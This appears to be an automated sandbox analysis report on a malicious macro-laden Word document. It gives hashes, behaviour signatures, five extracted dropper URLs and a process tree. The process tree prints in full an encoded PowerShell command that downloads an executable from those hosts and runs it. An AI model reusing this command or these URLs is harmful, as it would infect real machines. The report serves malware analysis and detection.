Analysis

  • max time kernel
    105s
  • max time network
    87s
  • platform
    windows7_x64
  • resource
    win7-20220715-en
  • resource tags

    arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
  • submitted
    25-07-2022 04:30

General

  • Target

    e545364bfe8e1e072499b805fdba2566887c176ac004783879bb66b22983c671.doc

  • Size

    144KB

  • MD5

    731bcf6a87db0b1671fd9c7eae939472

  • SHA1

    92144bc0c0cdef85940d2e5fa41a9c015c76efda

  • SHA256

    e545364bfe8e1e072499b805fdba2566887c176ac004783879bb66b22983c671

  • SHA512

    bce268f935565493417fc95e0503baec6fd770f78729c1dc98368b45d5741f760aa1ff6bd5f8bf8ade20947171a781b8cf6de0918a7e32961d4862d396208045

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://wsme.net/cgi-bin/xH/

exe.dropper

http://justart.ma/wp-content/uploads/2019/01/Ti/

exe.dropper

http://majorpart.co.th/wp/qI/

exe.dropper

http://estudioalabi.com.ar/wp-admin/NvvP/

exe.dropper

http://marketinsight.hu/wp-includes/ly/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 10 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e545364bfe8e1e072499b805fdba2566887c176ac004783879bb66b22983c671.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1936
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABKADEAQQBrAHcAMQA9ACgAJwBaAHgAQQAnACsAJwBCAEEAJwArACcAQQAnACkAOwAkAGkAXwB3AGsAWgB4AGMAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgAnACsAJwBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHAAQQBBADQAQQBBAEEAQQA9ACgAJwBoACcAKwAnAHQAJwArACcAdABwADoALwAnACsAJwAvAHcAcwBtAGUALgBuAGUAdAAvAGMAZwBpAC0AYgBpACcAKwAnAG4AJwArACcALwB4AEgALwBAAGgAJwArACcAdAB0ACcAKwAnAHAAOgAnACsAJwAvAC8AagB1AHMAdABhAHIAJwArACcAdAAuAG0AYQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQAJwArACcALwAnACsAJwB1AHAAbABvAGEAZABzAC8AMgAnACsAJwAwADEAJwArACcAOQAvADAAMQAnACsAJwAvAFQAaQAvAEAAaAB0AHQAcAA6AC8AJwArACcALwBtAGEAagBvAHIAcABhAHIAdAAuAGMAbwAuAHQAaAAvACcAKwAnAHcAcAAvAHEASQAvAEAAJwArACcAaAB0AHQAcAAnACsAJwA6AC8AJwArACcALwBlAHMAdAB1AGQAaQBvAGEAJwArACcAbABhACcAKwAnAGIAaQAuAGMAbwBtAC4AYQByAC8AdwBwACcAKwAnAC0AYQBkAG0AaQBuAC8ATgB2AHYAUAAvACcAKwAnAEAAaAB0ACcAKwAnAHQAcAA6AC8ALwAnACsAJwBtAGEAcgBrAGUAdABpAG4AcwBpAGcAaAB0AC4AaAB1ACcAKwAnAC8AdwBwAC0AaQAnACsAJwBuACcAKwAnAGMAbAB1AGQAZQBzAC8AbAB5AC8AJwApAC4AKAAnAFMAcAAnACsAJwBsAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAFEAawBBAEEAVQBBAGsAQQA9ACgAJwBUAFUAVQAnACsAJwBBAEEAJwArACcARwAnACkAOwAkAFkAVQBBAEcAUQBBAFoAUQAgAD0AIAAoACcAOAAnACsAJwAwADIAJwApADsAJAB3AEcAVQBVAFEAQQB3AGMAPQAoACcAdQAnACsAJwBDAEEAQQAnACsAJwBvAEQARAAnACkAOwAkAGIANABEAEIAXwBfAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABZAFUAQQBHAFEAQQBaAFEAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABJAEIARwBYAEEAVQBCACAAaQBuACAAJABwAEEAQQA0AEEAQQBBAEEAKQB7AHQAcgB5AHsAJABpAF8AdwBrAFoAeABjAC4AKAAnAEQAbwB3ACcAKwAnAG4AbABvACcAKwAnAGEAZAAnACsAJwBGAGkAbABlACcAKQAuAEkAbgB2AG8AawBlACgAJABJAEIARwBYAEEAVQBCACwAIAAkAGIANABEAEIAXwBfACkAOwAkAFoAeABYAGsAQwBYAEMAPQAoACcAQwBCADQAUQBRACcAKwAnAEMAJwArACcAUQB3ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABiADQARABCAF8AXwApAC4AIgBsAGAAZQBOAGcAYABUAGgAIgAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawAnACsAJwBlAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAGIANABEAEIAXwBfADsAJAB6AEIAWgBBAEEAQQAxAEQAPQAoACcAYQBBACcAKwAnAEEAbwBBAEcAQQBBACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABLAEIANABEAEEAQQBjAD0AKAAnAFkAJwArACcAawBBAFgAQQBCAEMAJwApADsA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:320

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/320-67-0x00000000021F0000-0x0000000002270000-memory.dmp

      Filesize

      512KB

    • memory/320-65-0x00000000021F0000-0x0000000002270000-memory.dmp

      Filesize

      512KB

    • memory/320-68-0x00000000021F0000-0x0000000002270000-memory.dmp

      Filesize

      512KB

    • memory/320-62-0x000007FEF37C0000-0x000007FEF41E3000-memory.dmp

      Filesize

      10.1MB

    • memory/320-64-0x00000000021F0000-0x0000000002270000-memory.dmp

      Filesize

      512KB

    • memory/320-63-0x000007FEF2520000-0x000007FEF307D000-memory.dmp

      Filesize

      11.4MB

    • memory/1936-60-0x000007FEFBB91000-0x000007FEFBB93000-memory.dmp

      Filesize

      8KB

    • memory/1972-55-0x0000000070101000-0x0000000070103000-memory.dmp

      Filesize

      8KB

    • memory/1972-59-0x00000000710ED000-0x00000000710F8000-memory.dmp

      Filesize

      44KB

    • memory/1972-57-0x0000000074F71000-0x0000000074F73000-memory.dmp

      Filesize

      8KB

    • memory/1972-66-0x00000000710ED000-0x00000000710F8000-memory.dmp

      Filesize

      44KB

    • memory/1972-54-0x0000000072681000-0x0000000072684000-memory.dmp

      Filesize

      12KB

    • memory/1972-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1972-69-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1972-70-0x00000000710ED000-0x00000000710F8000-memory.dmp

      Filesize

      44KB